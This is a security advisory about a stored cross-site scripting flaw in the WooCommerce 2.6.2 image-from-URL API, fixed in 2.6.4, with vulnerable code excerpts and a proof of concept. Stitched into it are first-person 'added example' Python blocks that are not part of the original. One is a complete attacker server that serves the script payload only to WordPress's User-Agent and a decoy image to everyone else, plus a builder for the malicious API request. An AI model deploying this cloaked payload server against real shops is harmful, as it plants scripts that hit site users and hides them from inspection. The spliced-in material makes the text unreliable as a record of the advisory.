WordPress Woocommerce 2.6.2 API Cross Site Scripting

Posted Sep 10, 2016
Authored by Securify B.V., Sipke Mellema

WordPress Woocommerce version 2.6.2 suffers from an API related cross site scripting vulnerability.

tags | exploit, xss
MD5 | c37b485881fa1b91c27088e2d7717d70

------------------------------------------------------------------------
Persistent Cross-Site Scripting in Woocommerce WordPress plugin
------------------------------------------------------------------------
Sipke Mellema, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A vulnerability exists in the Woocommerce API that allows for the
creation of malicious HTML files when an image is downloaded from an
attacker controlled URL.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160719-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Woocommerce version 2.6.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Woocommerce version 2.6.4.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_woocommerce_wordpress_plugin.html

The vulnerability exists in multiple places in the code. This description will use the code located at:
/includes/api/legacy/v3/class-wc-api-products.php
The vulnerable method is called upload_image_from_url. This method is used for adding product and product category images from a URL. wp_check_filetype is used to retrieve a file type for the filename in the URL.

$wp_filetype = wp_check_filetype( $file_name, null );

wp_check_filetype checks if the file extension matches the array of extensions returned by wp_get_mime_types. wp_get_mime_types returns a big list of file types, including HTML and most image files. It does not include the PHP file extension.

If wp_check_filetype cannot determine a file type from the URL (for example, because the URL ends with .php), the code falls back to the response headers sent by the remote server to derive the file name.

// Ensure we have a file name and type.
if ( ! $wp_filetype['type'] ) {
    $headers = wp_remote_retrieve_headers( $response );
    if ( isset( $headers['content-disposition'] ) && strstr( $headers['content-disposition'], 'filename=' ) ) {
        $disposition = end( explode( 'filename=', $headers['content-disposition'] ) );
        $disposition = sanitize_file_name( $disposition );
        $file_name   = $disposition;
    } elseif ( isset( $headers['content-type'] ) && strstr( $headers['content-type'], 'image/' ) ) {
        $file_name = 'image.' . str_replace( 'image/', '', $headers['content-type'] );
    }
}


The attacker-controlled server therefore decides the file name, either by sending a Content-Disposition header with a filename= parameter or by sending a Content-Type such as image/html, which becomes image.html. PHP files cannot be created this way, because the resulting name is passed to wp_upload_bits, which only accepts extensions present in the array returned by wp_get_mime_types; HTML is in that list, PHP is not.
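To make the decision path above concrete, here is an added example (my own code, not WooCommerce's) that re-implements the 2.6.2 file-name selection in Python so the stored name for a given URL and response can be checked offline, with a hardened variant next to it. MIME_TYPES is a constructed subset of wp_get_mime_types(), the URLs and header values are constructed test inputs, and hardened_file_name is my own suggestion, not a description of the 2.6.4 patch.

```python
"""Model of the file-name selection in WooCommerce 2.6.2 upload_image_from_url().

Added example, not WooCommerce code. It mirrors the quoted decision logic
(URL extension first, then Content-Disposition, then Content-Type) and puts
a hardened variant beside it. MIME_TYPES is a constructed subset of
wp_get_mime_types(); the hardened function is my own suggestion and does
not describe the 2.6.4 fix.
"""
import os
import re
from urllib.parse import urlparse

# Constructed subset of wp_get_mime_types(): images and HTML are listed,
# PHP is not, just as in WordPress core.
MIME_TYPES = {
    "jpg": "image/jpeg", "jpeg": "image/jpeg", "png": "image/png",
    "gif": "image/gif", "htm": "text/html", "html": "text/html",
}

# Magic bytes and extensions used by the hardened variant (allow-list).
IMAGE_MAGIC = {
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/jpeg": b"\xff\xd8\xff",
    "image/gif": b"GIF8",
}
IMAGE_EXT = {"image/png": "png", "image/jpeg": "jpg", "image/gif": "gif"}


def wp_check_filetype(filename):
    """Approximation of wp_check_filetype(): look the extension up in the
    MIME table; an unknown extension such as .php yields None."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    return MIME_TYPES.get(ext)


def sanitize_file_name(name):
    """Loose stand-in for sanitize_file_name(): drop quotes, directory parts
    and characters outside a conservative set. It does not reject .html."""
    name = os.path.basename(name.strip().strip("\"'"))
    return re.sub(r"[^A-Za-z0-9._-]", "", name)


def vulnerable_file_name(url, headers):
    """The 2.6.2 logic: URL extension first; when that is unknown, the remote
    server's Content-Disposition or Content-Type picks the name."""
    file_name = os.path.basename(urlparse(url).path)
    if not wp_check_filetype(file_name):
        disp = headers.get("content-disposition", "")
        ctype = headers.get("content-type", "")
        if "filename=" in disp:            # end( explode( 'filename=', ... ) )
            file_name = sanitize_file_name(disp.split("filename=")[-1])
        elif "image/" in ctype:            # 'image.' . str_replace( 'image/', '', ... )
            file_name = "image." + ctype.replace("image/", "")
    # wp_upload_bits() refuses extensions missing from the MIME table, which
    # is why shell.php never lands on disk while poc.html does.
    return file_name if wp_check_filetype(file_name) else None


def hardened_file_name(headers, body):
    """My own hardened variant: ignore Content-Disposition entirely, accept
    only an allow-listed image Content-Type, confirm it against the body's
    magic bytes, and choose the extension ourselves."""
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    magic = IMAGE_MAGIC.get(ctype)
    if magic is None or not body.startswith(magic):
        return None
    return "image." + IMAGE_EXT[ctype]
```

Running vulnerable_file_name with a .php URL and a Content-Disposition of filename=poc.html returns poc.html, while filename=shell.php is dropped by the MIME-table check, which is exactly the asymmetry the advisory relies on; the hardened variant returns None for anything that is not a genuine image.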

Other files that contain the vulnerable code pattern are:
/woocommerce/includes/wc-rest-functions.php
/woocommerce/includes/cli/class-wc-cli-product.php
/woocommerce/includes/api/legacy/v3/class-wc-api-products.php
/woocommerce/includes/api/legacy/v2/class-wc-api-products.php

Because WordPress identifies itself in the User-Agent header when fetching the image, an attacker's server can serve a normal image to ordinary visitors and deliver the HTML file only when the request comes from the Woocommerce API.

HTML files will not be included as a category image but will show up in the media library.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------

The attack works whenever the requested URL does not end in an extension known to wp_get_mime_types, for example when a popular image is served by a PHP script.

On an external server, create a file called image.php with the following content:

<?php
header("content-disposition: filename=poc.html");
echo "<script>alert(1)</script>";
?>

Now perform a PUT request to:

/wc-api/v3/products/categories/<valid id>?consumer_key=<key>&consumer_secret=<secret>

With the JSON content:

{"product_category":{"image":"http://<external server>/image.php"}}

The category image will be empty, and a file poc.html will appear in the upload folder.
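The following is an added example of the attacker side of the procedure above, written by me and not part of the original advisory. It generalises the image.php script using the User-Agent observation from the Details section: ordinary visitors receive a real PNG, while a fetch whose User-Agent contains "WordPress" receives the HTML payload with the Content-Disposition header that upload_image_from_url turns into the stored file name. The port, the hostnames, the category id and the consumer key/secret values are constructed placeholders.

```python
"""User-Agent-cloaked responder for the WooCommerce image-from-URL PoC.

Added example, not part of the original advisory. build_response() decides
what a visitor gets; api_request() assembles the PUT request from the PoC.
All hostnames, ids and credentials here are constructed placeholders.
"""
import json
import struct
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer

POC_FILENAME = "poc.html"                 # name WooCommerce will store the file under
PAYLOAD = b"<script>alert(1)</script>"    # same payload as the advisory's image.php


def png_1x1():
    """Build a valid 1x1 white PNG in memory so the decoy is a genuine image."""
    def chunk(tag, data):
        return (struct.pack(">I", len(data)) + tag + data
                + struct.pack(">I", zlib.crc32(tag + data) & 0xFFFFFFFF))
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit RGB
    raw = b"\x00\xff\xff\xff"                              # filter byte + one pixel
    return (b"\x89PNG\r\n\x1a\n" + chunk(b"IHDR", ihdr)
            + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b""))


def build_response(user_agent):
    """Return (status, headers, body): the HTML file for WordPress's fetch,
    a plain image for everybody else."""
    if "wordpress" in (user_agent or "").lower():
        headers = {
            "Content-Type": "text/html",
            "Content-Disposition": "filename=" + POC_FILENAME,
        }
        return 200, headers, PAYLOAD
    return 200, {"Content-Type": "image/png"}, png_1x1()


def api_request(category_id, consumer_key, consumer_secret, image_url):
    """Assemble the PUT request from the PoC: (method, path, JSON body)."""
    path = ("/wc-api/v3/products/categories/%d?consumer_key=%s&consumer_secret=%s"
            % (category_id, consumer_key, consumer_secret))
    return "PUT", path, json.dumps({"product_category": {"image": image_url}})


class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, headers, body = build_response(self.headers.get("User-Agent"))
        self.send_response(status)
        for name, value in headers.items():
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Serve on port 8000 (constructed), then point the API at
    # http://<this host>:8000/image.php via api_request(...).
    HTTPServer(("0.0.0.0", 8000), Handler).serve_forever()
```

The URL path deliberately ends in .php so wp_check_filetype finds no type and the header fallback is taken; the Content-Length header matters because wp_remote_get reads the body to completion before the file name is decided.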


------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

© 2019 Packet Storm. All rights reserved.